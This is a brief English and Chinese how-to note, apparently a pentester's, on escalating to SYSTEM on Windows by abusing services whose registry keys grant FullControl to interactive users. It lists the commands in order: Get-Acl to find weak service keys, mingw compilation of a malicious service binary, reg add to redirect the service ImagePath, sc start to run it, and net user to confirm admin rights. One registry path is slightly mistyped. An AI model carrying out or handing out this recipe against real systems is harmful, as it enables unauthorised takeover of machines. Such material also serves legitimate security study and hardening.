The principle of escalation of the rights of the registry:
write a fake service through the registry, and open the service, then the fake service will run our malicious code (the service runs with system permissions)
NT AUTHORITY\INTERACTIVE The current user's authority, use him to fully control the authority of the registry (if not configured properly)
powershell
Get-Acl -Path hklm:\System\CurrentControlSet\services\* | select Path,AccessToString |Format-List > 1.txt
在1.txt中查找"NT AUTHORITY\INTERACTIVE",直到找到一个Allow FullControl
powershellGet-Acl -Path hklm:\System\CurrentControlSet\services\a | fl (a为NT AUTHORITY\INTERACTIVE用户Allow FullControl的服务)
把windows_service.c在kali中编译成exe文件
x86_64-w64-mingw32-gcc windows_service.c -o x.exe
然后放到temp目录下,然后把提升权限的exe路径添加到查出来的服务
reg add HKLM\SYSTEM|CurrentControlSet\services\a /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
添加成功后,运行伪造好的服务:
sc start a
net user 查看已经是admin用户组了